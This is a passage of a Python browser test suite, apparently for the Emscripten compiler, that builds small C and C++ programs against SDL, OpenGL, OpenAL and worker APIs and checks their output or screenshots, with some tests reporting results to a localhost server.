shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp', 0)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.run_process([EMCC, 'supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', 'supp.wasm', '-s', 'EXPORT_ALL'], assert_returncode=76)
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
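# Run dependencies are, in essence, a counter that gates run(): run() is
# deferred while the count is non-zero. A minimal sketch of the idea (the
# real runtime also tracks optional dependency ids for debugging):
#
#   var runDependencies = 0;
#   function addRunDependency()    { runDependencies++; }
#   function removeRunDependency() { if (--runDependencies == 0) run(); }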
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
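# Note on the three entry points probed above: ccall(name, returnType,
# argTypes, args) invokes an exported C function once, cwrap(name,
# returnType, argTypes) returns a reusable JS wrapper, and Module['_note']
# is the raw exported function with no argument/return type conversion.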
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
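# The ABORT = false resets above are what let all three calls be probed in
# a single page load: each failed call aborts the runtime, and clearing the
# flag ("hackish", as the comments say) allows execution to reach the next.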
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
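# onRuntimeInitialized fires once the runtime is ready, i.e. the earliest
# point at which ccall/cwrap/direct calls are legal; any of the calls above
# made before that point should abort when ASSERTIONS are enabled.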
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=[_one,_two,_three,_four]', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.run_process([EMCC, test_file('browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
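# With --use-preload-plugins, the preload plugin pre-instantiates packaged
# .so files and records them in Module['preloadedWasm'] (which the EM_ASM
# above checks), letting the dlopen() call resolve synchronously here.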
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
